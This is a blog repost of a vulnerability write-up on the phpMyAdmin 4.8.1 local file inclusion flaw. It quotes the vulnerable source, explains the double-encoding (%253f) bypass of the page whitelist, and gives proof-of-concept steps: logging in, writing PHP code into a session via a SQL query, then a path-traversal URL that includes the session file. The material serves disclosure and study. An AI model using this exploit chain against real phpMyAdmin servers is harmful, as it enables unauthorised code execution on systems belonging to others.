phpMyAdmin 4.8.x LFI to RCE (Authorization Required) Welcome

About Me

Gender: Male
Industry: Technology
Occupation: System Supervisor
Location: Residential Hoang Gia, Ward No 2, My Hanh Nam Village, Duc Hoa DIST, Long An Province
Introduction: Cool....
Interests: Microsoft OS, Networking, RedHat Linux, System Administration, ... System Integration : IBM, Email Systems : IBM Lotus notes and Domino, VOIP,

...This is my personal and educational blog site and this has posts which are related to my research and interesting areas on Information Technology... Please feel free to comment on any technical/Article matters on this regard.

Thanks You !

Friday, June 22, 2018

phpMyAdmin 4.8.x LFI to RCE (Authorization Required)

8:09 AM

MISDUONG

No comments

Author: @Ambulong

Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution.
In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.
VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

Vulnerability Details

1.Line 54-63 in file /index.php:

1 // If we have a valid target, let's load that script instead


2 if (! empty($_REQUEST['target'])

3 && is_string($_REQUEST['target'])

4 && ! preg_match('/^index/', $_REQUEST['target'])

5 && ! in_array($_REQUEST['target'], $target_blacklist)

6 && Core::checkPageValidity($_REQUEST['target'])

7 ) {

8 include $_REQUEST['target'];

9   exit;

10 }

2.Core::checkPageValidity in /libraries/classes/Core.php

1 /**


2 * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)

3 *

4 * checks given $page against given $whitelist and returns true if valid

5 * it optionally ignores query parameters in $page (script.php?ignored)

6 *

7 * @param string &$page     page to check

8 * @param array  $whitelist whitelist to check page against

9 *

10 * @return boolean whether $page is valid or not (in $whitelist or not)

11 */

12 public static function checkPageValidity(&$page, array $whitelist = [])

13 {

14    if (empty($whitelist)) {

15        $whitelist = self::$goto_whitelist;

16    }

17    if (! isset($page) || !is_string($page)) {

18        return false;

19    }

20    if (in_array($page, $whitelist)) {

21        return true;

22    }

23    $_page = mb_substr(

24        $page,

25        0,

26        mb_strpos($page . '?', '?')

27    );

28    if (in_array($_page, $whitelist)) {

29        return true;

30    }

31    $_page = urldecode($page);

32    $_page = mb_substr(

33        $_page,

34        0,

35        mb_strpos($_page . '?', '?')

36    );

37    if (in_array($_page, $whitelist)) {

38        return true;

39    }

40    return false;

41 }

Core::checkPageValidity can be bypassed by using by double encoding like %253f.

Exploit

An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability.
1.Use username root, password toor log into phpmyadmin.

1	select '<?php phpinfo();exit;?>'

1	http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

Posted in: Exploit#

Welcome

Translate

Categories

About Me

NGÔ MINH TUẤN

Friday, June 22, 2018

phpMyAdmin 4.8.x LFI to RCE (Authorization Required)

Vulnerability Details

Exploit

0 nhận xét:

Post a Comment

Location & Blogroll

Popular Posts

Visitors

Archives